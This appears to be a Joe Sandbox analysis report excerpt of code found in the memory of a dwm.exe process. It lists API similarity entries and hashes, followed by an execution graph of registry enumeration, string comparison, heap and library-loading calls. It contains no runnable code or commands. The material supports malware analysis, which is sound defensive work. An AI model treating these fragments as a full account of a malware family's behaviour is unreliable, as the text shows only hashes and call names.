                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: c39ff187dcc0e0e5f536a4fac76e9a776cafec51ff5b46d80a89babcd34eae69
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: 30015B71B00A8596EA50DB63AC9876963F1F788FC8F494075CE8A43758DE3ACA85C384
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: a9d0cfdf3a281f3295b48c65dfd1401d86175ad9b62f8c2ae94cbc503dca9694
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: 99116DB4B0278982FB609B62EC1DB2663F0FB48B89F050464CD4907768EF3EC248C708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction ID: fd3107367779c28201210c1b92fbae820553748f933bce5c812884519a3b69b7
                                                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction Fuzzy Hash: 10518B36B116488AEB54CF15E84CB6977F6F384B8CF528124DA964778CEF36C941C708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: 31909a299ecda7a94a22d647d4a5cf6a54a4892b8af725065d02f0bf15318af3
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: D5F04472704689D2EB608F62FDD876967B0F744B8CF858060CA4D4A55CDF2DC788CB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: e84743f4e89460c603ff6c0aec795984c6940baca90cf5a9e8e55f832e295247
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: 7CF08270B04BC892EE808F13BD0853962B1EB48FD8F098171DE5A07B2CDE2DC685C708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: 06b6b6406f41cd5f300a45377c6ce31747c48fa02336624708355ecbbe4fa034
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: 33F082B1B2168891EF848F62EC8C77827F0AB88BC9F462019950B85668DF29C588C708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: d526ea1f6f3a823e4a9ca943e99befa5084ecf2fe588b0664762eb8867ec0e83
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: E981CF32F1069C89FB50AF629C48BBD27F0F744B8CF464216DE4A53799DB368481C329
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
                                                                                • Instruction ID: d6f426a7fdb5f77fff859a7115a8cec3b84b64155f6915dcc6ce821137a7e9c3
                                                                                • Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
                                                                                • Instruction Fuzzy Hash: 3061C976B29B88C6E660CF56E85872A77F0F389758F115115EA8D87BA8CF7DC440CB08
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: da99363393e5f528e167bf03ef0fb2507809969b3e54a8b7e2ee0afea74b34fe
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 3011A336FF4A0CC1F6641969EDEE37910F06B5437CF4B0626EB7606BDE8A6A8C49410C
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 233560325d177c6647b3c558e8c3ed17f4ab525f1b0894fe2e52707945bc3fd3
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: F5117332F54A0BC2F66C1165EDDE36912816B5B37CF4B462CBA7606BDE8A1ADC824180
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 0d69400d34ae6f0df7d57b950c272b2f995d69a697693c64b3b196697282221a
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 34117772F54B8E81F6581167DCDDB7510F1AB7437CF0B46A4AA76063DE8B564C41831C
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: fac96c093b7ac6db1a3a66b5be2caca39101a4a001f0d65babf6e02576babe37
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: B0518B32B1260C8AEB148F15EC48BA937F5F350BDCF668124DA1A4B78CDB36C845874A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 77dc6b3e6a1ef72f1456dd2c40b9823054b200f0a01f5be63d887cc4ee4c6610
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: 43517B32F126098BEB14CF25EC4CBA937E5F764B9CF6281349A1647B8CDB36D8418708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: 9178f7730ccf5d10352366ab890489981cd9bdc110fd7e89c8e4effef4afadb6
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: CC316B72B116489AE714DF11EC487A937F4F740BDCF668014AE5A4778CCB3AC945C70A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: 8ee16709b8625b91776432ae5c253be3ceb42bee4f9ac3913381f6a4d6c4fb54
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 9C316D71B1165497E714DF16EC8C7A937E4F741B9CF268028AE5A07B4CCB3AC941C748
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction ID: 2e5e68d70be1447c153d7868cef3dda12ca6c33c983a15425cc1f3da6a72ece1
                                                                                • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction Fuzzy Hash: 6B112E71A14B89D2E7549FA7E84862AB3B0F789B88F054069DB8A03718DF3DC151C748
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: 6df21819b0741812e928cf36c0c523ab9ed34276efc7733dca6479babce5017d
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: E771AD32B0478D86EA649E2A9D483FAA7F1F744BC8F460026DE4A43B9CDF36C644C704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: 7fe8a3023fbf63a109a775d972edc43dc64ebbba23531ec79d381b4c86bcf792
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: 1451EC32B0878D82EA749E2E9D5C3BA66F1F385788F164025DD8A03B9DCE37C545CB58
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: 2f1d578e736c1af2fcfea885247b938db3b9114df529238055782ab624d4cc50
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: FE41C572B14A8881EB609F26E8487A967F0F388788F524025EE4D87788DB3DC541CB54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
                                                                                • API String ID: 2588686239-3893581201
                                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction ID: a76b8c8ad337a3a2ab9f85481b7c48fa0d793d4e7661abcdd77c5af87ab95b2b
                                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                • Instruction Fuzzy Hash: 3D112476B08BC486D7608F56B8846AAB7B0F7C8B94F544126EACD83B19DF38C5408B44
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction ID: caa9825c6ec86e3645267b59d36000ce5d10e7e37a7d4ede0e55ded8350a6dd5
                                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                • Instruction Fuzzy Hash: 69114C32608B8482EB608F15E944669B7F0FB88B98F194224DF8D07B6CDF39C551CB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                • String ID: InitializeCriticalSectionEx
                                                                                • API String ID: 539475747-3084827643
                                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction ID: 587b03e066507e27a2cc6418c0ad798b0a59bd8609577f6e116a4b883512ba9d
                                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                • Instruction Fuzzy Hash: 31F0E271B107C882E704AF42FC08AB863B1AB88B98F5A4025A94D43F1CCF3AC994C748
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: 1bced809de21fde734ac46eb86d86b9b448842b7e90fb430b4d9a2b3bcff799d
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: 21E09271B5454D92EB059B95FC493F432F1DB8478CF9F502295190629ECF3ED88A8349
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: try_get_function
                                                                                • String ID: November$October
                                                                                • API String ID: 2742660187-1636048786
                                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction ID: f329ed48cda910d1b7dccd4698561394fa6ac53ca001f7378eaa8a04ca404730
                                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                • Instruction Fuzzy Hash: FBE09231F0454E92EA15AB55FC8C6F423B19B8874CF9B503596190665ECF3EC8868384
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Valuetry_get_function
                                                                                • String ID: FlsSetValue
                                                                                • API String ID: 738293619-3750699315
                                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction ID: 6b6b39cb39279c3414cc443775f1bfc165196f042fadc3edab264f41cbfc9013
                                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                • Instruction Fuzzy Hash: 9FE09BF1B0068891FB045F56FC0CAB463B2FBC8788F5A4021D5094675DCE3AC995C748
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction ID: 91bad54cf706a528f3d7b59dd7dfb6b881c8f68eb258a3e7e2ff5a4ef3a2242f
                                                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                • Instruction Fuzzy Hash: 8A21A932B04BC4C5EB518F6AE84826AF7F0FB84B98F564110DE8C87B19EF79C5428704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction ID: 4598a9b009fa944969a357c0f1fb729c989a90bcc4bc2a47c281c442831e5a2c
                                                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                • Instruction Fuzzy Hash: 5EE039B1B11645C6E7448BB3D8087693AF1EB88B05F4A8024C90907354DF7E8599C740

                                                                                Execution Graph

                                                                                Execution Coverage:0.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:81
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 14047 2a3f0661c28 14053 2a3f0661650 GetProcessHeap 14047->14053 14049 2a3f0661c3e Sleep SleepEx 14051 2a3f0661c37 14049->14051 14051->14049 14052 2a3f06615c0 StrCmpIW StrCmpW 14051->14052 14098 2a3f06618dc 14051->14098 14052->14051 14054 2a3f0661670 _invalid_parameter_noinfo 14053->14054 14116 2a3f0661274 GetProcessHeap 14054->14116 14056 2a3f0661678 14057 2a3f0661274 2 API calls 14056->14057 14058 2a3f0661689 14057->14058 14059 2a3f0661274 2 API calls 14058->14059 14060 2a3f0661692 14059->14060 14061 2a3f0661274 2 API calls 14060->14061 14062 2a3f066169b 14061->14062 14063 2a3f06616b6 RegOpenKeyExW 14062->14063 14064 2a3f06616e8 RegOpenKeyExW 14063->14064 14065 2a3f06618ce 14063->14065 14066 2a3f0661727 RegOpenKeyExW 14064->14066 14067 2a3f0661711 14064->14067 14065->14051 14068 2a3f0661762 RegOpenKeyExW 14066->14068 14069 2a3f066174b 14066->14069 14120 2a3f06612c8 RegQueryInfoKeyW 14067->14120 14072 2a3f0661786 14068->14072 14073 2a3f066179d RegOpenKeyExW 14068->14073 14131 2a3f066104c RegQueryInfoKeyW 14069->14131 14076 2a3f06612c8 11 API calls 14072->14076 14077 2a3f06617d8 RegOpenKeyExW 14073->14077 14078 2a3f06617c1 14073->14078 14074 2a3f066171d RegCloseKey 14074->14066 14079 2a3f0661793 RegCloseKey 14076->14079 14081 2a3f0661813 RegOpenKeyExW 14077->14081 14082 2a3f06617fc 14077->14082 14080 2a3f06612c8 11 API calls 14078->14080 14079->14073 14085 2a3f06617ce RegCloseKey 14080->14085 14083 2a3f0661837 14081->14083 14084 2a3f066184e RegOpenKeyExW 14081->14084 14086 2a3f06612c8 11 API calls 14082->14086 14087 2a3f066104c 4 API calls 14083->14087 14088 2a3f0661889 RegOpenKeyExW 14084->14088 14089 2a3f0661872 14084->14089 14085->14077 14090 2a3f0661809 RegCloseKey 14086->14090 14091 2a3f0661844 RegCloseKey 14087->14091 14093 2a3f06618c4 RegCloseKey 14088->14093 14094 2a3f06618ad 14088->14094 14092 2a3f066104c 4 API calls 14089->14092 14090->14081 14091->14084 14095 2a3f066187f RegCloseKey 14092->14095 14093->14065 14096 2a3f066104c 4 API calls 14094->14096 14095->14088 14097 2a3f06618ba RegCloseKey 14096->14097 14097->14093 14144 2a3f06614b4 14098->14144 14137 2a3f0673170 14116->14137 14119 2a3f06612ba _invalid_parameter_noinfo 14119->14056 14121 2a3f0661499 __free_lconv_num 14120->14121 14122 2a3f0661334 GetProcessHeap 14120->14122 14121->14074 14129 2a3f066134b _invalid_parameter_noinfo __free_lconv_num 14122->14129 14123 2a3f0661485 GetProcessHeap 14123->14121 14124 2a3f066135d RegEnumValueW 14124->14129 14126 2a3f066142f lstrlenW GetProcessHeap 14126->14129 14127 2a3f06613dd GetProcessHeap 14127->14129 14128 2a3f0661454 StrCpyW 14128->14129 14129->14123 14129->14124 14129->14126 14129->14127 14129->14128 14130 2a3f0661413 GetProcessHeap 14129->14130 14139 2a3f0661554 14129->14139 14130->14129 14132 2a3f06611b5 RegCloseKey 14131->14132 14136 2a3f06610b9 _invalid_parameter_noinfo __free_lconv_num 14131->14136 14132->14068 14133 2a3f06610c7 RegEnumValueW 14133->14136 14134 2a3f0661149 GetProcessHeap 14134->14136 14135 2a3f066117f GetProcessHeap 14135->14136 14136->14132 14136->14133 14136->14134 14136->14135 14138 2a3f066128f GetProcessHeap 14137->14138 14138->14119 14140 2a3f066156e 14139->14140 14143 2a3f06615a4 14139->14143 14141 2a3f0661585 StrCmpIW 14140->14141 14142 2a3f066158d StrCmpW 14140->14142 14140->14143 14141->14140 14142->14140 14143->14129 14145 2a3f06614d1 GetProcessHeap 14144->14145 14146 2a3f06614f0 GetProcessHeap 14144->14146 14147 2a3f06614ea __free_lconv_num 14145->14147 14148 2a3f0661505 __free_lconv_num 14146->14148 14147->14145 14147->14146 14148->14148 14149 2a3f066152a GetProcessHeap HeapFree 14148->14149 14150 2a3effc2908 14152 2a3effc2936 14150->14152 14151 2a3effc2a2b LoadLibraryA 14151->14152 14152->14151 14153 2a3effc2aa7 14152->14153

                                                                                Control-flow Graph

